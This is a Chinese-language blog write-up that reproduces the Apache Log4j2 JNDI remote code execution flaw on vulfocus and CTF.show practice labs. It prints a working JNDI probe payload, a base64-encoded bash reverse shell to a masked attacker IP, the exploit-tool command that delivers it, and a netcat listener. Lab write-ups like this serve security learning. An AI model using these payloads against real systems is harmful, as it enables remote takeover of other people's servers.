Apache Log4j2漏洞复现

0x00 前言

作者：Moco

慢慢的距离上次写文章已过去了377天，这一年发生了好多好多的事，经历了好多好多的变故，或喜或悲、或分或合、起起落落，整整的一年了得，没怎么好好学习，没怎么认真的钻研技术，对自己表示很抱歉，违背了“白帽守则”，让我们重温一下“白帽守则”：

白帽守则第一页第一条，心中无女人，挖洞自然神。

白帽守则第一页第二条，只有不努力的白帽，没有挖不到的漏洞

对此我深表歉意、望大家以我为戒，踏踏实实的深入贯彻落实“白帽守则”，切实维护祖国网络空间安全。

0x01 漏洞描述

Apache Log4j2是一款优秀的Java日志框架。2021年11月24日，阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。漏洞利用无需特殊配置，经阿里云安全团队验证，Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。阿里云应急响应中心提醒 Apache Log4j2 用户尽快采取安全措施阻止漏洞攻击。

12 月 10 日凌晨，Apache 开源项目 Log4j 的远程代码执行漏洞细节被公开，由于 Log4j 的广泛使用，该漏洞一旦被攻击者利用会造成严重危害。据悉，Apache Log4j 2.x <= 2.14.1 版本均回会受到影响。可能的受影响应用包括但不限于：Spring-Boot-strater-log4j2、Apache Struts2、Apache Solr、Apache Flink、Apache Druid、Elasticsearch、Flume、Dubbo、Redis、Logstash、Kafka 等。很多互联网企业都连夜做了应急措施。截至本文发出，斗鱼、京东、网易、深信服和汽车产业安全应急响应中心皆发文表示，鉴于该漏洞影响范围比较大，业务自查及升级修复需要一定时间，暂不接收 Log4j2 相关的远程代码执行漏洞。

0x02 漏洞影响

危险等级

高危

影响版本

Apache Log4j 2.x <= 2.15

0x03 靶场环境

本次用的是vulfocus和CTF.show搭建好的环境，毕竟自己比较懒，不喜欢搭环境。

vulfocus靶场环境地址：http://vulfocus.fofa.so/#/dashboard

选择：Log4j2远程命令执行

CTF.show靶场环境地址 ：https://ctf.show/challenges#Log4j复现-1730

0x04 漏洞验证与复现

启动环境

首先我们启动Log4j2远程命令执行的环境，给我们了提示了环境测试url：http://xxxxx/hello 和post参数为：payload=xxxxx。

开始测试

我们去访问vulfocus给开启的环境http://vulfocus.fofa.so:57105/hello

springboot 默认页面，大哥说他不支持get请求，根据提示，默认传参为post参数为：payload=xxxxx。

开启HackBar构造POST包

Ok了！！他ok了！！！，说明我们这个功能可以正常使用，那我们去寻找可以利用的payload，给同事要了篇文章https://www.cnblogs.com/0x200/p/15692319.html，从里面找到了利用的payload：

payload=${jndi:ldap://wdhcrj.dnslog.cn/exp}

 

复现成功

输入payload，发包，稍等一分钟，dnslog就收到了回显，这是我们可以证明存在Log4j2远程命令执行漏洞。

反弹shell

我们去在寻找反弹shell的payload与利用方法

首先

准备反弹shell的命令payload

bash -i >& /dev/tcp/1x.16x.x9.1x/1235 0>&1

并将其进行base64加密

YmFzaCAtaSA+JiAvZGV2L3RjcC8xeC4xNngueDkuMXgvMTIzNSAwPiYx

然后用大哥给的工具，生成payload

工具地址：https://github.com/bkfish/Apache-Log4j-Learning/tree/main/tools

运行

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo, YmFzaCAtaSA+JiAvZGV2L3RjcC8xeC4xNngueDkuMXgvMTIzNSAwPiYx}|{base64,-d}|{bash,-i}" -A "1x.16x.x9.1x "

一般我们选择第三个（JDK 没有版本的那个）payload进行攻击，服务器上开启nc监听

一波三折

由于vulfocus的环境访问的人数过多，反弹shell过慢，容易把环境卡死，故换成ctf.show的靶场进行复现，前面步骤都是一样的，不过ctf.show的不能开启动】hackbar和burp进行发包，只能通过前台登录口处进行发包请求，直接粘入payload，发包，成功反弹到shell。

输入env即可获取flag。

不忘初心

一开始是用的我Windows服务器进行反弹的，但是听我同事说windows的nc监听和Linux的不一样，当时一直以为是监听命令错了呢，最后才发现是环境有问题，使用的人太多了谈不过来了（ps此处没有打错字，就是“谈”，意思自行理解），其余步骤和上面的都一样。

附上windows监听的命令

 nc.exe -l -p 端口

再次打开ctf.show的环境成功反弹

总结与反思

世上无难事只要肯放弃！其实有很多时候我都感觉我是不是入错行，我是不是不适合干攻防渗透，一个洞，站在那么多大佬写的文章，和同事小伙伴的手把手教学，就那三四个步骤，两三条命令，我一错再错，什么忘监听端口了，什么端口没改拉，总之各种细节都把握的不够好，希望自己吧以后可以仔细仔细再仔细，无论遇到什么事情，都要去平淡的去看待他，慢慢来。

首先呢我在这遇到的第一个问题就是吧小写的‘l’，看成了大写的’I’,后面又遇到了生成dnslog打不开，特别慢的事故，后面又遇到了生成payload时Java报错说占用的情况，在同事的帮助下使用netstat -no | grep  2222查看端口，ps -ef | grep java查看Java的进程，kill -9 2422591杀掉了原来的Java进程解决的，后来用payload打的时候，还忘监听了。真的是，太不细心了。

0x05 参考文献与致谢

参考文献

https://www.cnblogs.com/xuzhujack/p/15673703.html

https://www.cnblogs.com/0x200/p/15692319.html

https://www.jb51.net/article/231932.htm

致谢

vulfocus 靶场：http://vulfocus.fofa.so/#/dashboard

CTF.Show靶场：https://ctf.show/challenges#Log4j复现-1730

转载请注明：Adminxe's Blog » Apache Log4j2漏洞复现